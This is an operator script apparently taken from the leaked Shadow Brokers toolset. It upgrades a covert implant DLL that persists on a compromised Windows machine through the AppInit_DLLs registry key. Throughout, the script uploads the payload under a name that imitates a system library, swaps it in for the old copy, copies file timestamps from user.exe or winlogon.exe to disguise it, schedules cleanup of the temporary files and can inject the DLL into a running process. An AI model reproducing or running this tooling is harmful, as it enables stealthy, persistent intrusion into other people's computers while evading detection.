shadowbrokers-exploits/windows/Resources/Pc2.2/Scripts/Install/winnt/AppInit/_Pc2.2Upgrade.dss

@include "_Paths.dsi";
@include "_Processes.dsi";
@include "_Versions.dsi";
@include "windows/_RegistryIncludes.dsi";
@echo off;
@disablewow64 on;

if ($argc != 3)
{
	echo("* Invalid parmeters", ERROR);
	echo();
	echo("Usage: $argv[0] <localFile> <procName>");
	return false;
}

string $localFile = $argv[1];
string $procName = $argv[2];

string $arch;
_GetArch($arch);

# get install name
string $payloadName			= "msvcp73.dll";
string $payloadLoadName		= "msvcp74.dll";
string $payloadDeleteName	= "msvcp73d.dll";
if (!GetInput("PC DLL install name", $payloadName, $payloadName) ||
	!GetInput("PC DLL temporary (to load) name", $payloadLoadName, $payloadLoadName) ||
	!GetInput("PC DLL temporary (to delete) name", $payloadDeleteName, $payloadDeleteName))
{
	echo("* Failed to get PC names", ERROR);
	return false;
}

string $payloadRegex = $payloadName;
RegExSub("[.]", "\\\\.", $payloadRegex);

# get the system path
string $sysPath;
if (!_GetSystemPath($sysPath))
{
	echo("* Failed to get system path", ERROR);
	return false;
}

# get the AppInit value
string $origAppInitValue;
if (!_GetRegistryValue("L", 
					   "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows",
					   "AppInit_DLLs",
					   $origAppInitValue) || !defined($origAppInitValue))
{
	$origAppInitValue = "";
}

if (!RegExMatch($payloadRegex, $origAppInitValue))
{
	echo("* Failed to find $payloadName in AppInit key", ERROR);
	return false;
}

# get the process id for injection
int $id;
if (prompt("Do you want to perform injection (for instant-grat)?"))
{
	if (StrLen($procName) > 0)
	{
		if (!_FindProcessOnList($procName, $id) || !defined($id))
		{
			echo("* Failed to find $procName", ERROR);
		}
	}

	# make sure the user wants to keep going if we don't have a process
	if (!defined($id))
	{
		echo("No process for injection", ERROR);
		if (!prompt("Continue?"))
		{
			return false;
		}
	}
}

# upload the new file
echo "Uploading new PC";
if (!`put "$localFile" -name "$sysPath\\$payloadLoadName" -permanent`)
{
	echo("    FAILED", ERROR);
	pause;
	return false;
}
echo("    FINISHED", GOOD);

# move the old file
echo "Moving old PC";
if (!`move "$sysPath\\$payloadName" "$sysPath\\$payloadDeleteName"`)
{
	echo("    FAILED", ERROR);
	echo "Performing recovery";
	if (!`delete -file "$sysPath\\$payloadLoadName"`)
	{
		echo("    FAILED", ERROR);
	}
	else
	{
		echo("    RECOVERED", GOOD);
	}
	pause;
	return false;
}
echo("    FINISHED", GOOD);

# copy the new file to it's final location
echo "Copying new PC to permanent location";
if (!`copy "$sysPath\\$payloadLoadName" "$sysPath\\$payloadName"`)
{
	echo("    FAILED", ERROR);
	echo "Performing recovery";
	if (!`move "$sysPath\\$payloadDeleteName" "$sysPath\\$payloadName"` ||
		!`delete -file "$sysPath\\$payloadLoadName"`)
	{
		echo("    FAILED", ERROR);
	}
	else
	{
		echo("    RECOVERED", GOOD);
	}
	pause;
	return false;
}
echo("    FINISHED", GOOD);

# matchtimes on the files
string $matchName = "user.exe";
if ($arch == "x64")
{
	$matchName = "winlogon.exe";
}
echo "Matching filetimes with $matchName";
if (!`matchfiletimes -src "$sysPath\\$matchName" -dst "$sysPath\\$payloadName"` ||
	!`matchfiletimes -src "$sysPath\\$matchName" -dst "$sysPath\\$payloadLoadName"` ||
	!`matchfiletimes -src "$sysPath\\$matchName" -dst "$sysPath\\$payloadDeleteName"`)
{
	echo("    FAILED", WARNING);
	pause;
	# continue...
}
else
{
	echo("    FINISHED", GOOD);
}

# mark the temp files for deletion
`delete -file "$sysPath\\$payloadLoadName" -afterreboot`;
`delete -file "$sysPath\\$payloadDeleteName" -afterreboot`;

if (defined($id))
{
	# inject the DLL
	echo "Injecting DLL";
	if (!`injectdll -library $payloadLoadName -id $id`)
	{
		echo("    FAILED", ERROR);
	}
	else
	{
		echo("    INJECTED", GOOD);
	}
}

echo "Upgrade Finished";
echo "AppInit : '$origAppInitValue'";

pause;
return true;